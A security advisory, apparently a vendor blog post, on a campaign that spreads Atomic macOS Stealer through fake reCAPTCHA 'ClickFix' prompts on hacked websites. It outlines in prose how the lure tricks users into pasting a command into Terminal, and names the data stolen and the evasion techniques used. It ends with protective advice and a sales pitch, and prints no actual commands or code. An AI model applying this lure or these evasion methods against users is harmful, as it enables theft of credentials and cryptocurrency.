Apple users are facing a new and sophisticated threat as a widespread Atomic macOS Stealer (AMOS) campaign leverages the "ClickFix" social engineering tactic. This campaign exploits thousands of hacked websites, tricking users into unknowingly installing malware that steals sensitive data, including passwords, cryptocurrency, and personal files.

New Malware Campaign Targets macOS Users

A new and extensive malware campaign, dubbed "MacReaper," is actively targeting macOS users. This operation utilizes a deceptive technique known as "ClickFix" or "ClearFix," which presents fake Google reCAPTCHA verification interfaces exclusively to macOS users on compromised websites. Security researchers have identified over 2,800 hacked websites involved in this campaign.

How the ClickFix Tactic Works

The ClickFix tactic is particularly insidious because it bypasses traditional security measures by manipulating users into self-compromising their systems. The process unfolds as follows:

• Deceptive Verification Pop-up: When a user visits a compromised website, a pop-up resembling a reCAPTCHA verification appears.

• Malicious Code Copy: Upon clicking "I'm not a robot," malicious code is silently copied to the user's clipboard.

• Instructions for Self-Infection: The user is then presented with instructions to open Terminal and paste the copied code, often using familiar Apple keyboard shortcuts.

• Malware Download and Installation: Executing this command downloads and installs the Atomic Stealer malware onto their Mac.

This method relies heavily on social engineering, exploiting users' familiarity with online verification processes to trick them into performing actions they normally wouldn't.

The Threat of Atomic Stealer (AMOS)

Atomic Stealer (AMOS) is a potent information-stealing malware available as a Malware-as-a-Service (MaaS). Once installed, AMOS can steal a wide range of sensitive data, including:

• Credentials stored in macOS Keychain

• Cookies, passwords, and autofill data from popular browsers like Chrome and Firefox

• Sensitive files from the infected device

• Digital currency from over 50 cryptocurrency wallets and extensions

This malware has been observed since April 2023 and is sold on underground forums for up to $3,000 per month, indicating its widespread use by cybercriminals.

Advanced Evasion Techniques

This campaign employs sophisticated techniques to evade detection and resist takedowns:

• EtherHiding: Malicious commands are embedded in Binance Smart Contract blockchain transactions, providing a resilient command and control infrastructure that is difficult for traditional security measures to block.

• Signed Mach-O Binary: The malware uses a signed Mach-O binary, allowing it to bypass macOS Gatekeeper security protections.

• Targeted Delivery: The attack is meticulously designed to target macOS users, with client-side and server-side mechanisms ensuring the ClickFix interface is displayed only on macOS devices.

Protecting Your Mac from This Threat

To safeguard against this evolving threat, users should adopt the following security practices:

• Never Execute Unprompted Terminal Commands: Be extremely wary of any website prompting you to open Terminal and paste commands, especially during CAPTCHA or verification processes.

• Be Skeptical of Verification Pop-ups: If a verification pop-up appears unusual or demands unusual actions, close the website immediately.

• Use Reputable Antivirus Software: While macOS has built-in security, consider using a reputable third-party Mac antivirus solution for additional protection.

• Keep Software Updated: Ensure your macOS and all security software are updated with the latest patches.

• Practice Good Cyber Hygiene: Stick to known and trusted websites, and be cautious of suspicious links or unexpected prompts.

By understanding the tactics employed by these attackers and implementing robust security measures, macOS users can significantly reduce their risk of falling victim to the Atomic Stealer campaign.

As cyber threats become increasingly sophisticated, your security strategy must evolve to keep pace. BetterWorld Technology offers adaptive cybersecurity solutions that grow with the threat landscape, helping your business stay secure while continuing to innovate. Reach out today to schedule your personalized consultation.

Sources

• Macs under threat from thousands of hacked sites spreading malware — how to stay safe, Tom's Guide.

• New Atomic macOS Stealer Campaign Exploits ClickFix to Target Apple Users, The Hacker News.

• Over 2,800 Hacked Websites Targeting MacOS Users with AMOS Stealer Malware, GBHackers News.

• Atomic Stealer malware strikes macOS via fake browser updates, BleepingComputer.